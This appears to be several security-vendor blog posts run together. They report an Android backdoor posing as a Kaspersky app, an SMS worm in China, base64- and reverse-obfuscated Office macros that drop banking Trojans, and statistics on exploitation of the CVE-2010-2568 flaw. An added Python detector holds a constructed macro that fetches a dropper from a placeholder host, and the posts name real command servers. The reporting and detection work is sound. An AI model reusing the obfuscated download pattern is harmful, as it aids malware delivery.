This week, our virus lab handled a case where a customer received a phishing email with an Android Backdoor archive masquerading as a Kaspersky mobile security app (we are aware that those who created this app are also disguising it as apps from other major AV brands).
It prompts recipients to install the fake Kaspersky Android app to protect their mobile security. From the context we can presume the intended targets are users in Poland.
Most email phishing attacks tend to target PC users, but this time the attackers have turned their attention to mobile platforms. We think this is a new trend in spreading viruses. Mobile security is closely tied to user privacy. In most cases, a mobile device is more important than a PC for users: it contains their contacts, text messages, photos and call logs. And mobile security is generally considered to be a weak point. So most people will believe these phishing emails and are likely to install the fake mobile security app.
In this case, the Android apk in the phishing email is a powerful and aggressive backdoor which is detected as Backdoor.AndroidOS.Zerat.a. The backdoor is full of malicious functions, but the GUI is a little simple and crude.
Perhaps its only purpose is to get you to install it and click the button. When executed, it connects to hxxp://winrar.nstrefa.pl/path/DeviceManager.php to register the victim's device information.
Then it visits hxxp://winrar.nstrefa.pl/path/Linker.php to get commands.
According to the commands, it will perform lots of malicious activities.
Some of the commands are shown below.
[Screenshot: intercepting text messages]
[Screenshot: store and upload]
This is a new type of mobile security threat that works just like a phishing site or phishing SMS. With the phishing email, the backdoor will spread more easily. There is reason to believe that increasingly complex mobile attacks will follow. Composite attacks on mobile platforms are simply a matter of time.
In this day and age it is very important to protect our privacy and device security. It's recommended to follow these tips:
- Download a mobile security app from the official Kaspersky website.
- Don't trust strange emails.
- Don't just open and execute files in email attachments.
On August 2, the Chinese Valentine's Day, an Android SMS worm struck China. It is called XXshenqi.apk. In the space of six hours, it infected about 500,000 devices. It has received widespread coverage in the local media. It's not just an SMS worm: it contains two malicious modules, XXshenqi.apk and its asset Trogoogle.apk.
The function of XXshenqi.apk is to send SMS to spread itself and to drop another backdoor on the victim device. It is detected as Trojan.AndroidOS.Xshqi.a by Kaspersky Lab.
After installation, it sends an SMS to all the names on the victim's contact lists to get them to install the Trojan as well.
Then it probes whether or not com.android.Trogoogle.apk is present on the mobile device. If not, it displays a dialog window to prompt the user to install Trogoogle.apk.
Trogoogle.apk is a resource file in the assets folder of XXshenqi.apk.
After that, it asks the user to register the app. The Trojan will steal the user's personal ID and name and send them to those controlling the malware.
Trogoogle.apk contains more malicious functions. It is a backdoor and detected as Backdoor.AndroidOS.Trogle.a by Kaspersky Lab. It hides its icon after installation so the user is unaware of its presence. It will then respond to commands to perform malicious activity. The commands include:
It also monitors the victim's text messages and sends them to the malware owner by email or SMS.
The fact that this Trojan combination appeared on the Chinese Valentine's Day is premeditated, taking advantage of user credulity on this special day. And it uses social engineering techniques to spread as widely as possible and infect more devices. This Trojan is a good example of why it's always worth thinking twice about trusting a link received on your mobile phone. No matter who sends it, it could still be a malicious program.
After going out of fashion for a number of years, malicious macros inside Office files have recently experienced a revival. And why not, especially if they are a lot cheaper than exploits and capable of doing the same job?
Yes, that's right, cybercriminals are busily recycling this old technique, introducing new obfuscation forms to make it more effective. Let's look at two examples.
Sample 1
This is an Excel file with malicious embedded macros. However, if you use standard Office tools to look at the macros, depending on the version, you will either see nothing malicious at all or you won't be allowed to see the macros themselves:
That is because all strings in the sample's macros are obfuscated with base64 encoding.
After de-obfuscation you can see clearly the URLs used to download the payloads:
This is a very simple technique but it is effective against simple heuristics that use string analysis of all incoming email attachments, and this is reflected in a very low VT detection rate: https://www.virustotal.com/en/file/c916540dcab796e7c034bfd948c54d9b87665c62334d8fea8d3724d9b1e9cfc9/analysis/1403955807/
This particular sample is also interesting since in some Excel versions it is able to run macros automatically without prompting the user to enable them. Once it has run, it drops a password-stealing Trojan directly onto the victim's system.
Sample 2
This other example is a fake Aeromexico ticket.
There is no obfuscation, but the URL is written from right to left, which again might be quite useful against simple grep-based analysis techniques:
It is interesting to note that the first sample was found in the wild in Venezuela, the second in Mexico and then the third in Brazil:
This one drops a ChePro banker. All three malicious samples drop only Trojans that steal financial data, but the same technique can be easily used to drop any type of malware.
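To show how a string-analysis heuristic can be extended to catch both tricks above (the base64-encoded strings of Sample 1 and the right-to-left URL of Sample 2), here is an added Python example that is not code from the original post. The macro text it scans is constructed, the URLs use the reserved example.invalid domain, and the StrReverse call is an assumption standing in for however the real sample reverses its string.

```python
import base64
import re

# Constructed VBA macro text (not from the real samples discussed above).
# Sample-1 style: the URL is kept as a base64 literal and decoded at runtime.
# Sample-2 style: the URL is written backwards and reversed before use.
MACRO_TEXT = r'''
Sub Auto_Open()
    Dim u As String
    u = Decode("aHR0cDovL2V4YW1wbGUuaW52YWxpZC9kcm9wcGVyLmV4ZQ==")
    Call Fetch(u)
End Sub

Sub Workbook_Open()
    Call Fetch(StrReverse("exe.reknab/dilavni.elpmaxe//:ptth"))
End Sub
'''

URL_RE = re.compile(r'https?://[\w.\-]+(?:/[\w.\-/%]*)?', re.IGNORECASE)
B64_RE = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')      # candidate base64 runs
STRING_LITERAL_RE = re.compile(r'"([^"\n]*)"')          # VBA string literals

def find_plain_urls(text):
    """What a naive grep-style heuristic sees: URLs written in the clear."""
    return URL_RE.findall(text)

def find_base64_urls(text):
    """Decode every plausible base64 run and look for URLs inside it."""
    found = []
    for blob in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode('ascii')
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: skip it
        found.extend(URL_RE.findall(decoded))
    return found

def find_reversed_urls(text):
    """Reverse each string literal and look for URLs in the mirrored text."""
    found = []
    for literal in STRING_LITERAL_RE.findall(text):
        found.extend(URL_RE.findall(literal[::-1]))
    return found

def extract_hidden_urls(text):
    """All URLs recovered from the two obfuscation forms, deduplicated."""
    return sorted(set(find_base64_urls(text) + find_reversed_urls(text)))
```

A plain URL search over the macro text finds nothing, while `extract_hidden_urls` recovers both download locations.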
So does this mean that only Latin American cybercriminals use this technique? The answer is no, not really. Our statistics on relative user infections show that the countries with the most attempted infections using this kind of malware are actually Germany and then Poland.
However, the technique is seen elsewhere, including Spain, Mexico, Brazil and others.
While analyzing malicious macro office files, you can see that the original document is created by one user and then somebody else (another criminal) assists in embedding the malicious macros.
The same technique can be easily used to drop any kind of malware in any country, since this is all about social engineering, and it will easily pass through email gateway security because it is basically an Office document, and email security policies allow those.
You may follow me on Twitter: @dimitribest
At Kaspersky Lab we regularly conduct threat studies dedicated to a particular type of cyber threat. This summer we decided to look closely at which versions of the Windows operating system are most popular among our users and also at what kind of vulnerabilities are used in cyber-attacks involving exploits. As a result we prepared a study called "Windows usage and vulnerabilities". Some of its results were rather predictable – but some were really surprising.
The summer of 2010 saw the appearance of Stuxnet, a computer worm which, as it turned out later, had been designed specifically to sabotage the uranium enrichment process at several facilities in Iran. Stuxnet was a real sensation which demonstrated what malware was capable of when precisely targeted and rigorously prepared. To proliferate, the worm used an exploit for the CVE-2010-2568 vulnerability. This is an error in the way Windows processes shortcut (.LNK) files that allows an arbitrary dynamic library to be loaded without the user's awareness. The vulnerability affected Windows XP, Vista, and Windows 7 as well as Windows Server 2003 and 2008.
The first malware exploiting this vulnerability was registered in July 2010. The worm Sality uses this vulnerability to distribute its own code: Sality generates malicious shortcuts and distributes them over the LAN. If a user opens a folder containing one of these shortcuts, the malicious program is launched immediately. After Sality and Stuxnet this vulnerability was used by the well-known Flame and Gauss spyware.
In autumn 2010, Microsoft released a security update that patched this vulnerability. Despite this, Kaspersky Lab detection systems are still registering tens of millions of detections of CVE-2010-2568 exploits. Over the study period, more than 50 million detections on more than 19 million computers worldwide were recorded.
It's worth noting the distribution of operating systems on which detections of the exploit for the LNK vulnerability were registered. The lion's share of detections (64.19%) registered over the last eight months involved XP and only 27.99% were on Windows 7. Kaspersky Lab products protecting Windows Server 2003 and 2008 also regularly report detection of these exploits (3.99% and 1.58% of detections respectively). The large number of detections coming from XP users suggests that most of these computers either don't have an installed security solution or use a vulnerable version of Windows - or both. The detections coming from server systems prove the presence of malicious shortcuts exploiting the CVE-2010-2568 vulnerability on network folders with open access.
The geographical distribution of all registered CVE-2010-2568 detections is also interesting.
CVE-2010-2568 detections, country distribution Nov 2013 - June 2014
Vietnam (42.45%), India (11.7%) and Algeria (5.52%) are among the leaders for the number of Kaspersky Lab detections of one of the most dangerous Windows vulnerabilities currently known. Interestingly, according to our research, the outdated XP OS is also widely used in all these countries. Here are the top countries for XP use in June 2014:
- Vietnam 38.79%
- China 27.35%
- India 26.88%
- Algeria 24.25%
- Italy 20.31%
- Spain 19.26%
- Russian Federation 17.40%
- France 12.04%
- Germany 8.54%
- United States 4.52%
Top 10 countries with the largest share of Windows XP users in the overall volume of users of Kaspersky Lab products.
It's not surprising that CVE-2010-2568 exploits are still popular in some of these countries. So many users of outdated versions of Windows mean that these exploits remain effective even though almost four years have passed since the disclosure and patching of the vulnerability.
Other findings from this research are available in the full report.